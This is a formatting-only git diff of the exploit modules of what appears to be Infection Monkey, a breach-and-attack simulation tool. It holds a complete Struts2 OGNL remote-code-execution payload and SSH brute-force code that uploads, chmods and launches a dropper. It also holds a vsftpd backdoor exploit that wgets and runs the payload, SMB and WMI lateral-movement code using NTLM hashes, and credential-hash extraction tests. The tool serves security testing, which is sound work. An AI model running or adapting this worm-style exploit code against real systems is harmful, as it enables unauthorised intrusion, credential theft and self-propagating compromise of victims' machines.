- "Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
- self.host,
- user,
- self._config.hash_sensitive_data(current_password),
+ "Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
+ self.host,
+ user,
+ self._config.hash_sensitive_data(current_password),
)
self.add_vuln_port(port)
self.report_login_attempt(True, user, current_password)
@@ -93,12 +94,12 @@ class SSHExploiter(HostExploiter):
except Exception as exc:
LOG.debug(
- "Error logging into victim %r with user"
- " %s and password (SHA-512) '%s': (%s)",
- self.host,
- user,
- self._config.hash_sensitive_data(current_password),
- exc,
+ "Error logging into victim %r with user"
+ " %s and password (SHA-512) '%s': (%s)",
+ self.host,
+ user,
+ self._config.hash_sensitive_data(current_password),
+ exc,
)
self.report_login_attempt(False, user, current_password)
ssh.close()
@@ -151,13 +152,14 @@ class SSHExploiter(HostExploiter):
if self.skip_exist:
_, stdout, stderr = ssh.exec_command(
- "head -c 1 %s" % self._config.dropper_target_path_linux
+ "head -c 1 %s" % self._config.dropper_target_path_linux
)
stdout_res = stdout.read().strip()
if stdout_res:
# file exists
LOG.info(
- "Host %s was already infected under the current configuration, done" % self.host
+ "Host %s was already infected under the current configuration, "
+ "done" % self.host
)
return True # return already infected
@@ -173,17 +175,17 @@ class SSHExploiter(HostExploiter):
self._update_timestamp = time.time()
with monkeyfs.open(src_path) as file_obj:
ftp.putfo(
- file_obj,
- self._config.dropper_target_path_linux,
- file_size=monkeyfs.getsize(src_path),
- callback=self.log_transfer,
+ file_obj,
+ self._config.dropper_target_path_linux,
+ file_size=monkeyfs.getsize(src_path),
+ callback=self.log_transfer,
)
ftp.chmod(self._config.dropper_target_path_linux, 0o777)
status = ScanStatus.USED
T1222Telem(
- ScanStatus.USED,
- "chmod 0777 %s" % self._config.dropper_target_path_linux,
- self.host,
+ ScanStatus.USED,
+ "chmod 0777 %s" % self._config.dropper_target_path_linux,
+ self.host,
).send()
ftp.close()
except Exception as exc:
@@ -191,7 +193,7 @@ class SSHExploiter(HostExploiter):
status = ScanStatus.SCANNED
T1105Telem(
- status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
+ status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
).send()
if status == ScanStatus.SCANNED:
return False
@@ -199,16 +201,16 @@ class SSHExploiter(HostExploiter):
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(
- self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
+ self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
)
cmdline += " > /dev/null 2>&1 &"
ssh.exec_command(cmdline)
LOG.info(
- "Executed monkey '%s' on remote victim %r (cmdline=%r)",
- self._config.dropper_target_path_linux,
- self.host,
- cmdline,
+ "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+ self._config.dropper_target_path_linux,
+ self.host,
+ cmdline,
)
ssh.close()
diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py
index c08c174fb..4b809da63 100644
--- a/monkey/infection_monkey/exploit/struts2.py
+++ b/monkey/infection_monkey/exploit/struts2.py
@@ -35,7 +35,8 @@ class Struts2Exploiter(WebRCE):
def build_potential_urls(self, ports, extensions=None):
"""
We need to override this method to get redirected url's
- :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
+ :param ports: Array of ports. One port is described as size 2 array: [port.no(int),
+ isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@@ -47,11 +48,11 @@ class Struts2Exploiter(WebRCE):
@staticmethod
def get_redirected(url):
# Returns false if url is not right
- headers = {"User-Agent": "Mozilla/5.0"}
+ headers = {"User-Agent":"Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers)
try:
return urllib.request.urlopen(
- request, context=ssl._create_unverified_context()
+ request, context=ssl._create_unverified_context()
).geturl()
except urllib.error.URLError:
LOG.error("Can't reach struts2 server")
@@ -66,25 +67,25 @@ class Struts2Exploiter(WebRCE):
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = (
- "%%{(#_='multipart/form-data')."
- "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
- "(#_memberAccess?"
- "(#_memberAccess=#dm):"
- "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
- "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
- "(#ognlUtil.getExcludedPackageNames().clear())."
- "(#ognlUtil.getExcludedClasses().clear())."
- "(#context.setMemberAccess(#dm))))."
- "(#cmd='%s')."
- "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
- "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
- "(#p=new java.lang.ProcessBuilder(#cmds))."
- "(#p.redirectErrorStream(true)).(#process=#p.start())."
- "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
- "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
- "(#ros.flush())}" % cmd
+ "%%{(#_='multipart/form-data')."
+ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+ "(#_memberAccess?"
+ "(#_memberAccess=#dm):"
+ "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+ "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+ "(#ognlUtil.getExcludedPackageNames().clear())."
+ "(#ognlUtil.getExcludedClasses().clear())."
+ "(#context.setMemberAccess(#dm))))."
+ "(#cmd='%s')."
+ "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+ "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+ "(#p=new java.lang.ProcessBuilder(#cmds))."
+ "(#p.redirectErrorStream(true)).(#process=#p.start())."
+ "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+ "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+ "(#ros.flush())}" % cmd
)
- headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
+ headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload}
try:
request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output
diff --git a/monkey/infection_monkey/exploit/tests/test_zerologon.py b/monkey/infection_monkey/exploit/tests/test_zerologon.py
index a2956887f..b637cfead 100644
--- a/monkey/infection_monkey/exploit/tests/test_zerologon.py
+++ b/monkey/infection_monkey/exploit/tests/test_zerologon.py
@@ -26,28 +26,28 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
- dummy_exploit_attempt_result = {"ErrorCode": 0}
+ dummy_exploit_attempt_result = {"ErrorCode":0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
- dummy_exploit_attempt_result = {"ErrorCode": 1}
+ dummy_exploit_attempt_result = {"ErrorCode":1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
- dummy_exploit_attempt_result
+ dummy_exploit_attempt_result
)
def test_assess_restoration_attempt_result_restored(zerologon_exploiter_object):
dummy_restoration_attempt_result = object()
assert zerologon_exploiter_object.assess_restoration_attempt_result(
- dummy_restoration_attempt_result
+ dummy_restoration_attempt_result
)
def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_object):
dummy_restoration_attempt_result = False
assert not zerologon_exploiter_object.assess_restoration_attempt_result(
- dummy_restoration_attempt_result
+ dummy_restoration_attempt_result
)
@@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
- USERS[0]: {
- "RID": int(RIDS[0]),
- "lm_hash": LM_HASHES[0],
- "nt_hash": NT_HASHES[0],
+ USERS[0]:{
+ "RID":int(RIDS[0]),
+ "lm_hash":LM_HASHES[0],
+ "nt_hash":NT_HASHES[0],
},
- USERS[1]: {
- "RID": int(RIDS[1]),
- "lm_hash": LM_HASHES[1],
- "nt_hash": NT_HASHES[1],
+ USERS[1]:{
+ "RID":int(RIDS[1]),
+ "lm_hash":LM_HASHES[1],
+ "nt_hash":NT_HASHES[1],
},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
- USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
- USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
+ USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""},
+ USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds
diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py
index cf94f6edc..b728a29b3 100644
--- a/monkey/infection_monkey/exploit/tools/helpers.py
+++ b/monkey/infection_monkey/exploit/tools/helpers.py
@@ -29,9 +29,10 @@ def get_target_monkey(host):
if not monkey_path:
if host.os.get("type") == platform.system().lower():
- # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe
+ # if exe not found, and we have the same arch or arch is unknown and we are 32bit,
+ # use our exe
if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get(
- "machine", ""
+ "machine", ""
).lower() == platform.machine().lower():
monkey_path = sys.executable
@@ -45,7 +46,7 @@ def get_target_monkey_by_os(is_windows, is_32bit):
def build_monkey_commandline_explicitly(
- parent=None, tunnel=None, server=None, depth=None, location=None, vulnerable_port=None
+ parent=None, tunnel=None, server=None, depth=None, location=None, vulnerable_port=None
):
cmdline = ""
@@ -71,12 +72,12 @@ def build_monkey_commandline(target_host, depth, vulnerable_port, location=None)
from infection_monkey.config import GUID
return build_monkey_commandline_explicitly(
- GUID,
- target_host.default_tunnel,
- target_host.default_server,
- depth,
- location,
- vulnerable_port,
+ GUID,
+ target_host.default_tunnel,
+ target_host.default_server,
+ depth,
+ location,
+ vulnerable_port,
)
@@ -106,13 +107,13 @@ def get_monkey_dest_path(url_to_monkey):
return WormConfiguration.dropper_target_path_win_64
else:
LOG.error(
- "Could not figure out what type of monkey server was trying to upload, "
- "thus destination path can not be chosen."
+ "Could not figure out what type of monkey server was trying to upload, "
+ "thus destination path can not be chosen."
)
return False
except AttributeError:
LOG.error(
- "Seems like monkey's source configuration property names changed. "
- "Can not get destination path to upload monkey"
+ "Seems like monkey's source configuration property names changed. "
+ "Can not get destination path to upload monkey"
)
return False
diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py
index d186adbab..6b218a0bf 100644
--- a/monkey/infection_monkey/exploit/tools/http_tools.py
+++ b/monkey/infection_monkey/exploit/tools/http_tools.py
@@ -43,7 +43,7 @@ class HTTPTools(object):
@staticmethod
def try_create_locked_transfer(host, src_path, local_ip=None, local_port=None):
http_path, http_thread = HTTPTools.create_locked_transfer(
- host, src_path, local_ip, local_port
+ host, src_path, local_ip, local_port
)
if not http_path:
raise Exception("Http transfer creation failed.")
@@ -98,7 +98,7 @@ class MonkeyHTTPServer(HTTPTools):
# Get monkey exe for host and it's path
src_path = try_get_target_monkey(self.host)
self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer(
- self.host, src_path
+ self.host, src_path
)
def stop(self):
diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing.py b/monkey/infection_monkey/exploit/tools/payload_parsing.py
index 052ab18e5..28af92a3e 100644
--- a/monkey/infection_monkey/exploit/tools/payload_parsing.py
+++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py
@@ -17,7 +17,8 @@ class Payload(object):
def get_payload(self, command=""):
"""
Returns prefixed and suffixed command (payload)
- :param command: Command to suffix/prefix. If no command is passed than objects' property is used
+ :param command: Command to suffix/prefix. If no command is passed than objects' property
+ is used
:return: prefixed and suffixed command (full payload)
"""
if not command:
@@ -46,14 +47,15 @@ class LimitedSizePayload(Payload):
def split_into_array_of_smaller_payloads(self):
if self.is_suffix_and_prefix_too_long():
raise Exception(
- "Can't split command into smaller sub-commands because commands' prefix and suffix already "
- "exceeds required length of command."
+ "Can't split command into smaller sub-commands because commands' prefix and "
+ "suffix already "
+ "exceeds required length of command."
)
elif self.command == "":
return [self.prefix + self.suffix]
wrapper = textwrap.TextWrapper(
- drop_whitespace=False, width=self.get_max_sub_payload_length()
+ drop_whitespace=False, width=self.get_max_sub_payload_length()
)
commands = [self.get_payload(part) for part in wrapper.wrap(self.command)]
return commands
diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py
index 18dcf6df2..738d7f760 100644
--- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py
+++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py
@@ -14,8 +14,8 @@ class TestPayload(TestCase):
pld_fail = LimitedSizePayload("b", 2, "a", "c")
pld_success = LimitedSizePayload("b", 3, "a", "c")
assert (
- pld_fail.is_suffix_and_prefix_too_long()
- and not pld_success.is_suffix_and_prefix_too_long()
+ pld_fail.is_suffix_and_prefix_too_long()
+ and not pld_success.is_suffix_and_prefix_too_long()
)
def test_split_into_array_of_smaller_payloads(self):
@@ -23,16 +23,17 @@ class TestPayload(TestCase):
pld1 = LimitedSizePayload(test_str1, max_length=16, prefix="prefix", suffix="suffix")
array1 = pld1.split_into_array_of_smaller_payloads()
test1 = bool(
- array1[0] == "prefix1234suffix"
- and array1[1] == "prefix5678suffix"
- and array1[2] == "prefix9suffix"
+ array1[0] == "prefix1234suffix"
+ and array1[1] == "prefix5678suffix"
+ and array1[2] == "prefix9suffix"
)
test_str2 = "12345678"
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
- array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
+ array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
+ array2) == 2
)
assert test1 and test2
diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py
index 9943b4135..c521facfb 100644
--- a/monkey/infection_monkey/exploit/tools/smb_tools.py
+++ b/monkey/infection_monkey/exploit/tools/smb_tools.py
@@ -21,14 +21,14 @@ LOG = logging.getLogger(__name__)
class SmbTools(object):
@staticmethod
def copy_file(
- host, src_path, dst_path, username, password, lm_hash="", ntlm_hash="", timeout=60
+ host, src_path, dst_path, username, password, lm_hash="", ntlm_hash="", timeout=60
):
assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,)
config = infection_monkey.config.WormConfiguration
src_file_size = monkeyfs.getsize(src_path)
smb, dialect = SmbTools.new_smb_connection(
- host, username, password, lm_hash, ntlm_hash, timeout
+ host, username, password, lm_hash, ntlm_hash, timeout
)
if not smb:
return None
@@ -36,13 +36,14 @@ class SmbTools(object):
# skip guest users
if smb.isGuestSession() > 0:
LOG.debug(
- "Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
- " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
- host,
- username,
- Configuration.hash_sensitive_data(password),
- Configuration.hash_sensitive_data(lm_hash),
- Configuration.hash_sensitive_data(ntlm_hash),
+ "Connection to %r granted guest privileges with user: %s, password (SHA-512): "
+ "'%s',"
+ " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
+ host,
+ username,
+ Configuration.hash_sensitive_data(password),
+ Configuration.hash_sensitive_data(lm_hash),
+ Configuration.hash_sensitive_data(ntlm_hash),
)
try:
@@ -59,12 +60,12 @@ class SmbTools(object):
return None
info = {
- "major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
- "minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
- "server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
- "server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
- "server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
- "simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
+ "major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
+ "minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
+ "server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
+ "server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
+ "server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
+ "simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
}
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@@ -89,23 +90,23 @@ class SmbTools(object):
if current_uses >= max_uses:
LOG.debug(
- "Skipping share '%s' on victim %r because max uses is exceeded",
- share_name,
- host,
+ "Skipping share '%s' on victim %r because max uses is exceeded",
+ share_name,
+ host,
)
continue
elif not share_path:
LOG.debug(
- "Skipping share '%s' on victim %r because share path is invalid",
- share_name,
- host,
+ "Skipping share '%s' on victim %r because share path is invalid",
+ share_name,
+ host,
)
continue
- share_info = {"share_name": share_name, "share_path": share_path}
+ share_info = {"share_name":share_name, "share_path":share_path}
if dst_path.lower().startswith(share_path.lower()):
- high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
+ high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),)
@@ -118,7 +119,7 @@ class SmbTools(object):
if not smb:
smb, _ = SmbTools.new_smb_connection(
- host, username, password, lm_hash, ntlm_hash, timeout
+ host, username, password, lm_hash, ntlm_hash, timeout
)
if not smb:
return None
@@ -127,16 +128,17 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
- "Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
+ "Error connecting tree to share '%s' on victim %r: %s", share_name, host,
+ exc
)
continue
LOG.debug(
- "Trying to copy monkey file to share '%s' [%s + %s] on victim %r",
- share_name,
- share_path,
- remote_path,
- host.ip_addr[0],
+ "Trying to copy monkey file to share '%s' [%s + %s] on victim %r",
+ share_name,
+ share_path,
+ remote_path,
+ host.ip_addr[0],
)
remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep))
@@ -151,7 +153,8 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
- "Remote monkey file is found but different, moving along with attack"
+ "Remote monkey file is found but different, moving along with "
+ "attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@@ -164,26 +167,28 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
- ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
+ ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
+ dst_path
).send()
LOG.info(
- "Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
- src_path,
- share_name,
- share_path,
- host,
+ "Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
+ src_path,
+ share_name,
+ share_path,
+ host,
)
break
except Exception as exc:
LOG.debug(
- "Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
+ "Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
+ exc
)
T1105Telem(
- ScanStatus.SCANNED,
- get_interface_to_target(host.ip_addr),
- host.ip_addr,
- dst_path,
+ ScanStatus.SCANNED,
+ get_interface_to_target(host.ip_addr),
+ host.ip_addr,
+ dst_path,
).send()
continue
finally:
@@ -196,13 +201,14 @@ class SmbTools(object):
if not file_uploaded:
LOG.debug(
- "Couldn't find a writable share for exploiting victim %r with "
- "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
- host,
- username,
- Configuration.hash_sensitive_data(password),
- Configuration.hash_sensitive_data(lm_hash),
- Configuration.hash_sensitive_data(ntlm_hash),
+ "Couldn't find a writable share for exploiting victim %r with "
+ "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
+ "SHA-512): %s",
+ host,
+ username,
+ Configuration.hash_sensitive_data(password),
+ Configuration.hash_sensitive_data(lm_hash),
+ Configuration.hash_sensitive_data(ntlm_hash),
)
return None
@@ -222,9 +228,9 @@ class SmbTools(object):
return None, None
dialect = {
- SMB_DIALECT: "SMBv1",
- SMB2_DIALECT_002: "SMBv2.0",
- SMB2_DIALECT_21: "SMBv2.1",
+ SMB_DIALECT:"SMBv1",
+ SMB2_DIALECT_002:"SMBv2.0",
+ SMB2_DIALECT_21:"SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked
@@ -232,14 +238,14 @@ class SmbTools(object):
smb.login(username, password, "", lm_hash, ntlm_hash)
except Exception as exc:
LOG.debug(
- "Error while logging into %r using user: %s, password (SHA-512): '%s', "
- "LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: %s",
- host,
- username,
- Configuration.hash_sensitive_data(password),
- Configuration.hash_sensitive_data(lm_hash),
- Configuration.hash_sensitive_data(ntlm_hash),
- exc,
+ "Error while logging into %r using user: %s, password (SHA-512): '%s', "
+ "LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: %s",
+ host,
+ username,
+ Configuration.hash_sensitive_data(password),
+ Configuration.hash_sensitive_data(lm_hash),
+ Configuration.hash_sensitive_data(ntlm_hash),
+ exc,
)
return None, dialect
@@ -258,7 +264,7 @@ class SmbTools(object):
@staticmethod
def get_dce_bind(smb):
rpctransport = transport.SMBTransport(
- smb.getRemoteHost(), smb.getRemoteHost(), filename=r"\srvsvc", smb_connection=smb
+ smb.getRemoteHost(), smb.getRemoteHost(), filename=r"\srvsvc", smb_connection=smb
)
dce = rpctransport.get_dce_rpc()
dce.connect()
diff --git a/monkey/infection_monkey/exploit/tools/test_helpers.py b/monkey/infection_monkey/exploit/tools/test_helpers.py
index 60cc136e5..37c784d24 100644
--- a/monkey/infection_monkey/exploit/tools/test_helpers.py
+++ b/monkey/infection_monkey/exploit/tools/test_helpers.py
@@ -7,12 +7,12 @@ class TestHelpers(unittest.TestCase):
def test_build_monkey_commandline_explicitly(self):
test1 = " -p 101010 -t 10.10.101.10 -s 127.127.127.127:5000 -d 0 -l C:\\windows\\abc -vp 80"
result1 = build_monkey_commandline_explicitly(
- 101010, "10.10.101.10", "127.127.127.127:5000", 0, "C:\\windows\\abc", 80
+ 101010, "10.10.101.10", "127.127.127.127:5000", 0, "C:\\windows\\abc", 80
)
test2 = " -p parent -s 127.127.127.127:5000 -d 0 -vp 80"
result2 = build_monkey_commandline_explicitly(
- parent="parent", server="127.127.127.127:5000", depth="0", vulnerable_port="80"
+ parent="parent", server="127.127.127.127:5000", depth="0", vulnerable_port="80"
)
self.assertEqual(test1, result1)
diff --git a/monkey/infection_monkey/exploit/tools/wmi_tools.py b/monkey/infection_monkey/exploit/tools/wmi_tools.py
index b6d96aa82..0bb9e35c4 100644
--- a/monkey/infection_monkey/exploit/tools/wmi_tools.py
+++ b/monkey/infection_monkey/exploit/tools/wmi_tools.py
@@ -17,8 +17,8 @@ class DceRpcException(Exception):
class AccessDeniedException(Exception):
def __init__(self, host, username, password, domain):
super(AccessDeniedException, self).__init__(
- "Access is denied to %r with username %s\\%s and password %r"
- % (host, domain, username, password)
+ "Access is denied to %r with username %s\\%s and password %r"
+ % (host, domain, username, password)
)
@@ -37,18 +37,18 @@ class WmiTools(object):
domain = host.ip_addr
dcom = DCOMConnection(
- host.ip_addr,
- username=username,
- password=password,
- domain=domain,
- lmhash=lmhash,
- nthash=nthash,
- oxidResolver=True,
+ host.ip_addr,
+ username=username,
+ password=password,
+ domain=domain,
+ lmhash=lmhash,
+ nthash=nthash,
+ oxidResolver=True,
)
try:
iInterface = dcom.CoCreateInstanceEx(
- wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
+ wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
)
except Exception as exc:
dcom.disconnect()
diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py
index d8e88b44c..fb4749217 100644
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@@ -1,6 +1,7 @@
"""
Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp
+ /vsftpd_234_backdoor.rb
only vulnerable version is "2.3.4"
"""
@@ -121,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
- download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
+ download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
@@ -134,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
http_thread.stop()
# Change permissions
- change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
+ change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
@@ -142,25 +143,26 @@ class VSFTPDExploiter(HostExploiter):
# Run monkey on the machine
parameters = build_monkey_commandline(
- self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
+ self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
)
run_monkey = RUN_MONKEY % {
- "monkey_path": monkey_path,
- "monkey_type": MONKEY_ARG,
- "parameters": parameters,
+ "monkey_path":monkey_path,
+ "monkey_type":MONKEY_ARG,
+ "parameters":parameters,
}
# Set unlimited to memory
- # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
+ # we don't have to revert the ulimit because it just applies to the shell obtained by our
+ # exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)
if backdoor_socket.send(run_monkey):
LOG.info(
- "Executed monkey '%s' on remote victim %r (cmdline=%r)",
- self._config.dropper_target_path_linux,
- self.host,
- run_monkey,
+ "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+ self._config.dropper_target_path_linux,
+ self.host,
+ run_monkey,
)
self.add_executed_cmd(run_monkey.decode())
return True
diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py
index f51fe1539..e5c5a33bf 100644
--- a/monkey/infection_monkey/exploit/web_rce.py
+++ b/monkey/infection_monkey/exploit/web_rce.py
@@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {
- "linux": self._config.dropper_target_path_linux,
- "win32": self._config.dropper_target_path_win_32,
- "win64": self._config.dropper_target_path_win_64,
+ "linux":self._config.dropper_target_path_linux,
+ "win32":self._config.dropper_target_path_win_32,
+ "win64":self._config.dropper_target_path_win_64,
}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
@@ -69,21 +69,27 @@ class WebRCE(HostExploiter):
"""
exploit_config = {}
- # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
+ # dropper: If true monkey will use dropper parameter that will detach monkey's process
+ # and try to copy
# it's file to the default destination path.
exploit_config["dropper"] = False
- # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
- # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
+ # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,
+ # 'windows': WIN_CMD}
+ # Command must have "monkey_path" and "http_path" format parameters. If None defaults
+ # will be used.
exploit_config["upload_commands"] = None
- # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
+ # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home",
+ # "index.php"]
exploit_config["url_extensions"] = []
- # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
+ # stop_checking_urls: If true it will stop checking vulnerable urls once one was found
+ # vulnerable.
exploit_config["stop_checking_urls"] = False
- # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
+ # blind_exploit: If true we won't check if file exist and won't try to get the
+ # architecture of target.
exploit_config["blind_exploit"] = False
return exploit_config
@@ -111,12 +117,12 @@ class WebRCE(HostExploiter):
# Skip if monkey already exists and this option is given
if (
- not exploit_config["blind_exploit"]
- and self.skip_exist
- and self.check_remote_files(self.target_url)
+ not exploit_config["blind_exploit"]
+ and self.skip_exist
+ and self.check_remote_files(self.target_url)
):
